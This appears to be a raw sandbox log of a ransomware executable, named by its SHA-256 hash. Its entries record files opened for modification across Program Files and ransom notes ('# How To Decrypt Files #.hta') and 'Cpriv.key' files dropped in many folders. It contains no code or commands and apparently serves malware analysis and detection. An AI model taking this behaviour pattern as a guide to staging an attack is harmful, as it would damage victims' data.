de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18231_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Mozilla Firefox\Accessible.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.THD de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multitabs.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00919_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0217302.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21305_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBPQT.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\WCOMP98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\ado\adovbs.inc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_snow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImage.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\decorative_rule.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_win.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\Asia\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN109.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SONORA\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ARFR\MSB1ARFR.ITS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\picturePuzzle.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_flyout.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107328.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Certificates\groove.net\ManagedObjects\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-outline.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_divider_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Roses.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP.bat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02166_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\GREETING.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\LINEACT.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_thunderstorm.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Updater6\AdobeUpdater.cer de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTO\vstoee90.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\ENGIDX.DAT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00559_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\SECURS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\MEIPreload\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationUp_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CG1606.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0217262.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\QUIKPUBS.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_settings.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-next-static.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\ExecutiveLetter.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)redStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_es.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\core_visualvm.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107528.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK.HOL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Distinctive.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-execution.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00174_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up_BIDI.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\MEIPreload\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-next-over-select.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232803.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14528_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSPUB.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\BORDERS\MSART10.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\BORDERS\MSART8.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Defender\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows NT\TableTextService\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\Alphabet.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\sonicsptransform.ax de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Media Renderer\connectionmanager_dmr.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14768_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\HWRCustomization\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSOUC.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME47.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\button.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL089.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\css\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387882.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\LABEL98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\America\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-highlight.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157167.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Document Parts\1033\14\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239975.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02746U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\MSBuild\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_m.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.ui_1.1.200.v20130626-2037.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02313_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME14.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Documentation\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\20.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04191_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00160_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00012_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\GIFIMP32.FLT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\EXPEDITN\EXPEDITN.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02794_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN026.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107482.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01332U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Office 2.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\2.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_hail.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\RMNSQUE\RMNSQUE.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\spu\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_flyout.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SKY\SKY.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp_3.6.300.v20140407-1855.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_m.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Assets.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200163.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00942_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\VeriSign_Class_3_Public_Primary_CA.cer de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\system_m.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\kab.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\applet\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedback.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02127_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00693_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01561_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14753_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\WSS_DocLib.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\MSMAPI\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\next_rest.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WksConv\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14791_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\PublicFunctions.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\vlc.mo 